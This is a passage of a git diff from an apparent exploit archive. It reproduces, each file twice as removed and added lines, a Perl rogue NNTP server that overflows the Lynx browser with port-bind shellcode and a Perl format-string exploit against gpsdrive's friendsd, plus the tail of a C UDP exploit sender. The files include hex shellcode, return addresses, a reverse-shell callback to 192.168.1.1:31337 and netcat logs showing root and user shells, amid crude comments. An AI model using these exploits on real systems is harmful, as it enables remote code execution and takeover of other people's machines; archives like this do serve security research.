packet matching IDS signature. + g_password[0] = 0; + + if ( (dest = inet_addr(argv[1])) == (unsigned long)-1) + printf("Bad IP: '%s'\n", argv[1]); + else { + int s; + hostin.s_addr = dest; + s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); + + printf("Selected target:\n%3d | %s\n", ntarget+1, + targets[ntarget].desc); + explbuild(buff, &targets[ntarget]); + + printf("\nSending exploit to %s\n", inet_ntoa(hostin)); + if (sendping(dest, port, s, buff)) + printf("Sending exploit failed for dest %s\n", + inet_ntoa(hostin)); + printf("Done.\n"); + } + + return 0; +} + +// milw0rm.com [2005-10-25] diff --git a/platforms/linux/remote/1288.pl b/platforms/linux/remote/1288.pl index ccd71733a..4ec91d9cf 100755 --- a/platforms/linux/remote/1288.pl +++ b/platforms/linux/remote/1288.pl @@ -1,205 +1,205 @@ -#!/usr/bin/perl -- - -# lynx-nntp-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. - -#********************************************************************************* -#********************************************************************************* -# -# edited by xwings in 1st Nov 2005 , xwings at xwings.net -# -# For all my friends in #mantis @ ptp -# -# 14:21 < mark> xwings -# 14:21 < mark> wanna fuck -# 14:21 < xwings> mark: sure -# 14:21 < mark> sweet -# 14:21 * mark gets his lingerie -# -# Why lynx ? I guess ... I am bored ... :p -# -# Metasploit Port Bind Shellcode , Port : 3964 -# -# Downloaded lynx from : -# ftp://lynx.isc.org/lynx-2.8.3/lynx2-8-3.tar.gz -# -# Configure , make , make install under Kubuntu 5.10 (Breezy). -# gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9) -# Linux note 2.6.12-9-386 #1 Mon Oct 10 13:14:36 BST 2005 i686 GNU/Linux -# -# (01:24:12).xwings@note.$ /home/xwings/usr/bin/lynx -version -# -# Lynx Version 2.8.3rel.1 (23 Apr 2000) -# Built on linux-gnu Oct 22 2005 23:44:16 -# -# Copyrights held by the University of Kansas, CERN, and other contributors. -# Distributed under the GNU General Public License. -# See http://lynx.browser.org/ and the online help for more information. -# -# *** [ Screen 1 ] *** -# (01:21:30).xwings@note.$ sudo perl lynx-nntp-server.pl -# connection from 127.0.0.1 -# SENT: 200 Internet News -# RECEIVED: mode reader -# SENT: 200 Internet News -# RECEIVED: GROUP my.server -# SENT: 211 1 1 1 my.server -# RECEIVED: HEAD 1 -# SENT: 221 1 -# Path: host!someotherhost!onemorehost -# From: -# Subject: $@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU -# (JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU -# (JUUFFFFFF1É.���$�s����cB�k C�i�VRaoZg�WaoX��bS͹��{�XX��X.�Xi -# �YoambRaoEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE -# AAAAAAAAAABBBBBBBBBBCCCCCCCC� -# Newsgroup: my.server -# Message-ID: -# . -# TIMED OUT -# RECEIVED: -# closed -# -# *** [ Screen 2 ] *** -# (01:21:39).xwings@note.$ sudo ./lynx nntp://localhost/my.server -# -# *** [ Screen 3 ] *** -# (11:53:41).xwings@note.<~>$ nc localhost 3964 -# id -# uid=0(root) gid=0(root) groups=0(root) -# -#********************************************************************* -#********************************************************************* - -use strict; -use IO::Socket; - -$main::port = 119; -$main::timeout = 5; - - -# *** SUBROUTINES *** - - -sub mysend($$) -{ - my $file = shift; - my $str = shift; - - print $file "$str\n"; - print "SENT: $str\n"; -} # sub mysend - - -sub myreceive($) -{ - my $file = shift; - my $inp; - - eval - { - local $SIG{ALRM} = sub { die "alarm\n" }; - alarm $main::timeout; - $inp = <$file>; - alarm 0; - }; - - if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } - $inp =~ tr/\015\012\000//d; - print "RECEIVED: $inp\n"; - $inp; -} # sub myreceive - - -# *** MAIN PROGRAM *** - - -{ - my $server = IO::Socket::INET->new( Proto => 'tcp', - LocalPort => $main::port, - Listen => SOMAXCONN, - Reuse => 1); - die "can't set up server!\n" unless $server; - - - while (my $client = $server->accept()) - { - $client->autoflush(1); - print 'connection from '.$client->peerhost."\n"; - - - mysend($client, '200 Internet News'); - my $group = 'alt.angst'; - - while (my $str = myreceive($client)) - { - if ($str =~ m/^mode reader$/i) - { - mysend($client, '200 Internet News'); - next; - } - - if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) - { - $group = $1; - mysend($client, "211 1 1 1 $group"); - next; - } - - if ($str =~ m/^quit$/i) - { - mysend($client, '205 Goodbye'); - last; - } - - if ($str =~ m/^head ([0-9]+)$/i) - { - my $evil = '$@UU(JUU' x 15; # Edit the number! - #$evil .= 'A' x (504 - length $evil); <-- I don't need this .. - - ## Added by xwings - - $evil .= 'F' x 6; # Where is my shell ? - $evil .= "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". - "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b". - "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52". - "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2". - "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58". - "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69". - "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"; - $evil .= 'E' x 236; # Initial Marker - $evil .= 'A' x 10; # Move Abit Further - $evil .= 'B' x 10; # Oh .. Abit more - $evil .= 'C' x 8; # Nearer ... - $evil .= "\x9c\xdf\xff\xbf"; #RET 0xbfffdf9c - - ## End of Add , xwings - - my $head = < -Path: host!someotherhost!onemorehost -From: -Subject: $evil -Newsgroup: $group -Message-ID: -. -HERE - - $head =~ s|\s+$||s; - mysend($client, $head); - next; - } - - mysend($client, '500 Syntax Error'); - } # while str=myreceive(client) - - close $client; - print "closed\n\n\n"; - } # while client=server->accept() -} - -# milw0rm.com [2005-11-02] +#!/usr/bin/perl -- + +# lynx-nntp-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. + +#********************************************************************************* +#********************************************************************************* +# +# edited by xwings in 1st Nov 2005 , xwings at xwings.net +# +# For all my friends in #mantis @ ptp +# +# 14:21 < mark> xwings +# 14:21 < mark> wanna fuck +# 14:21 < xwings> mark: sure +# 14:21 < mark> sweet +# 14:21 * mark gets his lingerie +# +# Why lynx ? I guess ... I am bored ... :p +# +# Metasploit Port Bind Shellcode , Port : 3964 +# +# Downloaded lynx from : +# ftp://lynx.isc.org/lynx-2.8.3/lynx2-8-3.tar.gz +# +# Configure , make , make install under Kubuntu 5.10 (Breezy). +# gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9) +# Linux note 2.6.12-9-386 #1 Mon Oct 10 13:14:36 BST 2005 i686 GNU/Linux +# +# (01:24:12).xwings@note.$ /home/xwings/usr/bin/lynx -version +# +# Lynx Version 2.8.3rel.1 (23 Apr 2000) +# Built on linux-gnu Oct 22 2005 23:44:16 +# +# Copyrights held by the University of Kansas, CERN, and other contributors. +# Distributed under the GNU General Public License. +# See http://lynx.browser.org/ and the online help for more information. +# +# *** [ Screen 1 ] *** +# (01:21:30).xwings@note.$ sudo perl lynx-nntp-server.pl +# connection from 127.0.0.1 +# SENT: 200 Internet News +# RECEIVED: mode reader +# SENT: 200 Internet News +# RECEIVED: GROUP my.server +# SENT: 211 1 1 1 my.server +# RECEIVED: HEAD 1 +# SENT: 221 1 +# Path: host!someotherhost!onemorehost +# From: +# Subject: $@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU +# (JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU(JUU$@UU +# (JUUFFFFFF1É.���$�s����cB�k C�i�VRaoZg�WaoX��bS͹��{�XX��X.�Xi +# �YoambRaoEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE +# AAAAAAAAAABBBBBBBBBBCCCCCCCC� +# Newsgroup: my.server +# Message-ID: +# . +# TIMED OUT +# RECEIVED: +# closed +# +# *** [ Screen 2 ] *** +# (01:21:39).xwings@note.$ sudo ./lynx nntp://localhost/my.server +# +# *** [ Screen 3 ] *** +# (11:53:41).xwings@note.<~>$ nc localhost 3964 +# id +# uid=0(root) gid=0(root) groups=0(root) +# +#********************************************************************* +#********************************************************************* + +use strict; +use IO::Socket; + +$main::port = 119; +$main::timeout = 5; + + +# *** SUBROUTINES *** + + +sub mysend($$) +{ + my $file = shift; + my $str = shift; + + print $file "$str\n"; + print "SENT: $str\n"; +} # sub mysend + + +sub myreceive($) +{ + my $file = shift; + my $inp; + + eval + { + local $SIG{ALRM} = sub { die "alarm\n" }; + alarm $main::timeout; + $inp = <$file>; + alarm 0; + }; + + if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } + $inp =~ tr/\015\012\000//d; + print "RECEIVED: $inp\n"; + $inp; +} # sub myreceive + + +# *** MAIN PROGRAM *** + + +{ + my $server = IO::Socket::INET->new( Proto => 'tcp', + LocalPort => $main::port, + Listen => SOMAXCONN, + Reuse => 1); + die "can't set up server!\n" unless $server; + + + while (my $client = $server->accept()) + { + $client->autoflush(1); + print 'connection from '.$client->peerhost."\n"; + + + mysend($client, '200 Internet News'); + my $group = 'alt.angst'; + + while (my $str = myreceive($client)) + { + if ($str =~ m/^mode reader$/i) + { + mysend($client, '200 Internet News'); + next; + } + + if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) + { + $group = $1; + mysend($client, "211 1 1 1 $group"); + next; + } + + if ($str =~ m/^quit$/i) + { + mysend($client, '205 Goodbye'); + last; + } + + if ($str =~ m/^head ([0-9]+)$/i) + { + my $evil = '$@UU(JUU' x 15; # Edit the number! + #$evil .= 'A' x (504 - length $evil); <-- I don't need this .. + + ## Added by xwings + + $evil .= 'F' x 6; # Where is my shell ? + $evil .= "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8". + "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b". + "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52". + "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2". + "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58". + "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69". + "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"; + $evil .= 'E' x 236; # Initial Marker + $evil .= 'A' x 10; # Move Abit Further + $evil .= 'B' x 10; # Oh .. Abit more + $evil .= 'C' x 8; # Nearer ... + $evil .= "\x9c\xdf\xff\xbf"; #RET 0xbfffdf9c + + ## End of Add , xwings + + my $head = < +Path: host!someotherhost!onemorehost +From: +Subject: $evil +Newsgroup: $group +Message-ID: +. +HERE + + $head =~ s|\s+$||s; + mysend($client, $head); + next; + } + + mysend($client, '500 Syntax Error'); + } # while str=myreceive(client) + + close $client; + print "closed\n\n\n"; + } # while client=server->accept() +} + +# milw0rm.com [2005-11-02] diff --git a/platforms/linux/remote/1290.pl b/platforms/linux/remote/1290.pl index 28e21d206..08559fcab 100755 --- a/platforms/linux/remote/1290.pl +++ b/platforms/linux/remote/1290.pl @@ -1,179 +1,179 @@ -#!/usr/bin/perl -w -# -# Heh - Code by KF (kf_lists[at]digital_munition[dot]com) -# - Shellcode by Charles Stevenson -# http://www.digitalmunition.com -# -# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. -# Free 14 day Testicle licking trial available! -# -# IIIIIIIIII -# I::::::::I -# I::::::::I -# II::::::II -# I::::I -# I::::I ## ## ####### ######## ## ## -# I::::I ## ## ## ## ## ## #### -# EEEEEEEEEEEEEEEEEEEEEE I::::I ## ## ## ## ######## ## -# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## -# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## -# EE::::::EEEEEEEEE::::E I::::I ### ####### ## ## ## -# E:::::E EEEEEE I::::I -# E:::::E II::::::II -# E::::::EEEEEEEEEE I::::::::I -# E:::::::::::::::E and I::::::::I -# E:::::::::::::::E IIIIIIIIII -# E::::::EEEEEEEEEE ######## ####### ## ## ## ## -# E:::::E ## ## ## ## ### ## ## ## -# E:::::E EEEEEE ## ## ## ## #### ## #### -# EE::::::EEEEEEEE:::::E ######## ## ## ## ## ## ## -# E::::::::::::::::::::E ## ## ## ## ## #### ## -# E::::::::::::::::::::E ## ## ## ## ## ### ## -# EEEEEEEEEEEEEEEEEEEEEE ######## ####### ## ## ## -# (Kickin you all up in your grill piece since the early 90's) -# -# friendsd.c:367: fprintf (stderr, txt); -# -# Tested against: gpsdrive_2.09-2_powerpc.deb -# -# Crash the program and go to frame 2 -# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 -# (gdb) bt -# #0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 -# #1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6 -# #2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6 -# #3 0x100024b8 in dg_echo () -# #4 0x10002f28 in main () -# -# Grab the address of Arglist for frame 2 and overwrite that +4 -# (gdb) i f -# Stack level 2, frame at 0x7fffad70: -# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8 -# called by frame at 0x7fffae00, caller of frame at 0x7fff8700 -# Arglist at 0x7fffad70, args: -# Locals at 0x7fffad70, Previous frame's sp in r1 -# -# (gdb) x/a 0x7fffad70+4 -# 0x7fffad74: 0xf6825d0 (overwrite this) -# -# animosity:/home/kfinisterre# nc -l -p 31337 -vvv -# listening on [any] 31337 ... -# 192.168.1.1: inverse host lookup failed: Unknown host -# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349 -# id; -# uid=1000(kfinisterre) gid=1000(kfinisterre) -# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) -# uname -a; -# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux -# -# This is NOT reliable or robust... Find your own damn pointers to overwrite - -use Net::Friends; -use Data::Dumper; - -$shellcode = -"\x69\x69\x69\x69" . -# /* connect-core5.c by Charles Stevenson */ -"\x7c\x3f\x0b\x78" . #/*mr r31,r1*/ -"\x3b\x40\x01\x0e" . #/*li r26,270*/ -"\x3b\x5a\xfe\xf4" . #/*addi r26,r26,-268*/ -"\x7f\x43\xd3\x78" . #/*mr r3,r26*/ -"\x3b\x60\x01\x0d" . #/*li r27,269*/ -"\x3b\x7b\xfe\xf4" . #/*addi r27,r27,-268*/ -"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ -"\x7c\xa5\x2a\x78" . #/*xor r5,r5,r5*/ -"\x7c\x3c\x0b\x78" . #/*mr r28,r1*/ -"\x3b\x9c\x01\x0c" . #/*addi r28,r28,268*/ -"\x90\x7c\xff\x08" . #/*stw r3,-248(r28)*/ -"\x90\x9c\xff\x0c" . #/*stw r4,-244(r28)*/ -"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ -"\x7f\x63\xdb\x78" . #/*mr r3,r27*/ -"\x3b\xdf\x01\x0c" . #/*addi r30,r31,268*/ -"\x38\x9e\xff\x08" . #/*addi r4,r30,-248*/ -"\x3b\x20\x01\x98" . #/*li r25,408*/ -"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7c\x78\x1b\x78" . #/*mr r24,r3*/ -"\xb3\x5e\xff\x16" . #/*sth r26,-234(r30)*/ -"\x7f\xbd\xea\x78" . #/*xor r29,r29,r29*/ -#// Craft your exploit to poke these value in. Right now it's set -#// for port 31337 and ip 192.168.1.1. Here's an example -#// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 -#// 0xc0a8 -#// 0x0101 -"\x63\xbd" . # /* PORT # */ -"\x7a\x69" . #/*ori r29,r29,31337*/ -"\xb3\xbe\xff\x18" . #/*sth r29,-232(r30)*/ -"\x3f\xa0" . # /*IP(A.B) */ -#"\x42\x07" . # wtf is this? -"\xc0\xa8" . # /*lis r29,-16216*/ -"\x63\xbd" . # /*IP(C.D) */ -#"\xa1\x39" . # wtf is this? -"\x01\x01" . # /*ori r29,r29,257*/ -"\x93\xbe\xff\x1a" . #/*stw r29,-230(r30)*/ -"\x93\x1c\xff\x08" . #/*stw r24,-248(r28)*/ -"\x3a\xde\xff\x16" . #/*addi r22,r30,-234*/ -"\x92\xdc\xff\x0c" . #/*stw r22,-244(r28)*/ -"\x3b\xa0\x01\x1c" . #/*li r29,284*/ -"\x38\xbd\xfe\xf4" . #/*addi r5,r29,-268*/ -"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ -"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ -"\x7c\x7a\xda\x14" . #/*add r3,r26,r27*/ -"\x38\x9c\xff\x08" . #/*addi r4,r28,-248*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ -"\x7c\x84\x22\x78" . #/*xor r4,r4,r4*/ -"\x3a\xe0\x01\xf8" . #/*li r23,504*/ -"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ -"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ -"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -#// comment out the next 4 lines to save 16 bytes and lose stderr -#//"\x7f\x03\xc3\x78" /*mr r3,r24*/ -#//"\x7f\x44\xd3\x78" /*mr r4,r26*/ -#//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ -#//"\x44\xde\xad\xf2" /*.long0x44deadf2*/ -"\x7c\xa5\x2a\x79" . #/*xor. r5,r5,r5*/ -"\x42\x40\xff\x35" . #/*bdzl+ 10000454
*/ -"\x7f\x08\x02\xa6" . #/*mflr r24*/ -"\x3b\x18\x01\x34" . #/*addi r24,r24,308*/ -"\x98\xb8\xfe\xfb" . #/*stb r5,-261(r24)*/ /* KF / Core / Ghandi mojo */ -"\x38\x78\xfe\xf4" . #/*addi r3,r24,-268*/ -"\x90\x61\xff\xf8" . #/*stw r3,-8(r1)*/ -"\x38\x81\xff\xf8" . #/*addi r4,r1,-8*/ -"\x90\xa1\xff\xfc" . #/*stw r5,-4(r1)*/ -"\x3b\xc0\x01\x60" . #/*li r30,352*/ -"\x7f\xc0\x2e\x70" . #/*srawi r0,r30,5*/ -"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ -"/bin/shZ"; # /* Z will become NULL */ - -$name = 'aaaaaaaa-aaaa'; - -$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb) -$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. - -$addy = pack('l', $writeaddr); -$addy2 = pack('l', $writeaddr+2); - -#$instr = 0x7fffae84; # Shellcode (inside gdb) -$instr = 0x7fffaea4; # Shellcode (outside gdb) - -$lo = ($instr >> 0) & 0xffff; -$hi = ($instr >> 16) & 0xffff; - -$hi = $hi - 0x4e; -$lo = (0x10000 + $lo) - $hi - 0x50; - -#$hi = 1; $lo =1; - -$dir = "$addy$addy2|%." . $hi . "d|%28\$hn|%." . $lo . "d|%29\$hn$shellcode"; - -$friends = Net::Friends->new(shift || 'localhost'); -$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); -print Dumper($friends->query); - -# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! - -# milw0rm.com [2005-11-04] +#!/usr/bin/perl -w +# +# Heh - Code by KF (kf_lists[at]digital_munition[dot]com) +# - Shellcode by Charles Stevenson +# http://www.digitalmunition.com +# +# FrSIRT 24/24 & 7/7 - Centre de Recherche on Donkey Testicles. +# Free 14 day Testicle licking trial available! +# +# IIIIIIIIII +# I::::::::I +# I::::::::I +# II::::::II +# I::::I +# I::::I ## ## ####### ######## ## ## +# I::::I ## ## ## ## ## ## #### +# EEEEEEEEEEEEEEEEEEEEEE I::::I ## ## ## ## ######## ## +# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## +# E::::::::::::::::::::E I::::I ## ## ## ## ## ## ## +# EE::::::EEEEEEEEE::::E I::::I ### ####### ## ## ## +# E:::::E EEEEEE I::::I +# E:::::E II::::::II +# E::::::EEEEEEEEEE I::::::::I +# E:::::::::::::::E and I::::::::I +# E:::::::::::::::E IIIIIIIIII +# E::::::EEEEEEEEEE ######## ####### ## ## ## ## +# E:::::E ## ## ## ## ### ## ## ## +# E:::::E EEEEEE ## ## ## ## #### ## #### +# EE::::::EEEEEEEE:::::E ######## ## ## ## ## ## ## +# E::::::::::::::::::::E ## ## ## ## ## #### ## +# E::::::::::::::::::::E ## ## ## ## ## ### ## +# EEEEEEEEEEEEEEEEEEEEEE ######## ####### ## ## ## +# (Kickin you all up in your grill piece since the early 90's) +# +# friendsd.c:367: fprintf (stderr, txt); +# +# Tested against: gpsdrive_2.09-2_powerpc.deb +# +# Crash the program and go to frame 2 +# 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 +# (gdb) bt +# #0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 +# #1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6 +# #2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6 +# #3 0x100024b8 in dg_echo () +# #4 0x10002f28 in main () +# +# Grab the address of Arglist for frame 2 and overwrite that +4 +# (gdb) i f +# Stack level 2, frame at 0x7fffad70: +# pc = 0xf6825d0 in fprintf; saved pc 0x100024b8 +# called by frame at 0x7fffae00, caller of frame at 0x7fff8700 +# Arglist at 0x7fffad70, args: +# Locals at 0x7fffad70, Previous frame's sp in r1 +# +# (gdb) x/a 0x7fffad70+4 +# 0x7fffad74: 0xf6825d0 (overwrite this) +# +# animosity:/home/kfinisterre# nc -l -p 31337 -vvv +# listening on [any] 31337 ... +# 192.168.1.1: inverse host lookup failed: Unknown host +# connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349 +# id; +# uid=1000(kfinisterre) gid=1000(kfinisterre) +# groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) +# uname -a; +# Linux animosity 2.6.11-powerpc #1 Fri May 13 15:47:19 CEST 2005 ppc GNU/Linux +# +# This is NOT reliable or robust... Find your own damn pointers to overwrite + +use Net::Friends; +use Data::Dumper; + +$shellcode = +"\x69\x69\x69\x69" . +# /* connect-core5.c by Charles Stevenson */ +"\x7c\x3f\x0b\x78" . #/*mr r31,r1*/ +"\x3b\x40\x01\x0e" . #/*li r26,270*/ +"\x3b\x5a\xfe\xf4" . #/*addi r26,r26,-268*/ +"\x7f\x43\xd3\x78" . #/*mr r3,r26*/ +"\x3b\x60\x01\x0d" . #/*li r27,269*/ +"\x3b\x7b\xfe\xf4" . #/*addi r27,r27,-268*/ +"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ +"\x7c\xa5\x2a\x78" . #/*xor r5,r5,r5*/ +"\x7c\x3c\x0b\x78" . #/*mr r28,r1*/ +"\x3b\x9c\x01\x0c" . #/*addi r28,r28,268*/ +"\x90\x7c\xff\x08" . #/*stw r3,-248(r28)*/ +"\x90\x9c\xff\x0c" . #/*stw r4,-244(r28)*/ +"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ +"\x7f\x63\xdb\x78" . #/*mr r3,r27*/ +"\x3b\xdf\x01\x0c" . #/*addi r30,r31,268*/ +"\x38\x9e\xff\x08" . #/*addi r4,r30,-248*/ +"\x3b\x20\x01\x98" . #/*li r25,408*/ +"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7c\x78\x1b\x78" . #/*mr r24,r3*/ +"\xb3\x5e\xff\x16" . #/*sth r26,-234(r30)*/ +"\x7f\xbd\xea\x78" . #/*xor r29,r29,r29*/ +#// Craft your exploit to poke these value in. Right now it's set +#// for port 31337 and ip 192.168.1.1. Here's an example +#// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 +#// 0xc0a8 +#// 0x0101 +"\x63\xbd" . # /* PORT # */ +"\x7a\x69" . #/*ori r29,r29,31337*/ +"\xb3\xbe\xff\x18" . #/*sth r29,-232(r30)*/ +"\x3f\xa0" . # /*IP(A.B) */ +#"\x42\x07" . # wtf is this? +"\xc0\xa8" . # /*lis r29,-16216*/ +"\x63\xbd" . # /*IP(C.D) */ +#"\xa1\x39" . # wtf is this? +"\x01\x01" . # /*ori r29,r29,257*/ +"\x93\xbe\xff\x1a" . #/*stw r29,-230(r30)*/ +"\x93\x1c\xff\x08" . #/*stw r24,-248(r28)*/ +"\x3a\xde\xff\x16" . #/*addi r22,r30,-234*/ +"\x92\xdc\xff\x0c" . #/*stw r22,-244(r28)*/ +"\x3b\xa0\x01\x1c" . #/*li r29,284*/ +"\x38\xbd\xfe\xf4" . #/*addi r5,r29,-268*/ +"\x90\xbc\xff\x10" . #/*stw r5,-240(r28)*/ +"\x7f\x20\x16\x70" . #/*srawi r0,r25,2*/ +"\x7c\x7a\xda\x14" . #/*add r3,r26,r27*/ +"\x38\x9c\xff\x08" . #/*addi r4,r28,-248*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ +"\x7c\x84\x22\x78" . #/*xor r4,r4,r4*/ +"\x3a\xe0\x01\xf8" . #/*li r23,504*/ +"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" . #/*mr r3,r24*/ +"\x7f\x64\xdb\x78" . #/*mr r4,r27*/ +"\x7e\xe0\x1e\x70" . #/*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +#// comment out the next 4 lines to save 16 bytes and lose stderr +#//"\x7f\x03\xc3\x78" /*mr r3,r24*/ +#//"\x7f\x44\xd3\x78" /*mr r4,r26*/ +#//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +#//"\x44\xde\xad\xf2" /*.long0x44deadf2*/ +"\x7c\xa5\x2a\x79" . #/*xor. r5,r5,r5*/ +"\x42\x40\xff\x35" . #/*bdzl+ 10000454
*/ +"\x7f\x08\x02\xa6" . #/*mflr r24*/ +"\x3b\x18\x01\x34" . #/*addi r24,r24,308*/ +"\x98\xb8\xfe\xfb" . #/*stb r5,-261(r24)*/ /* KF / Core / Ghandi mojo */ +"\x38\x78\xfe\xf4" . #/*addi r3,r24,-268*/ +"\x90\x61\xff\xf8" . #/*stw r3,-8(r1)*/ +"\x38\x81\xff\xf8" . #/*addi r4,r1,-8*/ +"\x90\xa1\xff\xfc" . #/*stw r5,-4(r1)*/ +"\x3b\xc0\x01\x60" . #/*li r30,352*/ +"\x7f\xc0\x2e\x70" . #/*srawi r0,r30,5*/ +"\x44\xde\xad\xf2" . #/*.long0x44deadf2*/ +"/bin/shZ"; # /* Z will become NULL */ + +$name = 'aaaaaaaa-aaaa'; + +$writeaddr = 0x7fffad74; # Saved ret in frame 2 Arglist+4 (inside gdb) +$writeaddr = 0x7fffad94; # (outside gdb) Pladow! Kickin fools all up in the grill piece. + +$addy = pack('l', $writeaddr); +$addy2 = pack('l', $writeaddr+2); + +#$instr = 0x7fffae84; # Shellcode (inside gdb) +$instr = 0x7fffaea4; # Shellcode (outside gdb) + +$lo = ($instr >> 0) & 0xffff; +$hi = ($instr >> 16) & 0xffff; + +$hi = $hi - 0x4e; +$lo = (0x10000 + $lo) - $hi - 0x50; + +#$hi = 1; $lo =1; + +$dir = "$addy$addy2|%." . $hi . "d|%28\$hn|%." . $lo . "d|%29\$hn$shellcode"; + +$friends = Net::Friends->new(shift || 'localhost'); +$friends->report(name => $name, lat => '1111', lon => '2222', speed => '3333', dir => $dir); +print Dumper($friends->query); + +# P.S. Fsck drow! And did I mention k-otick blows! Gimme some freedom fries you bastards! + +# milw0rm.com [2005-11-04] diff --git 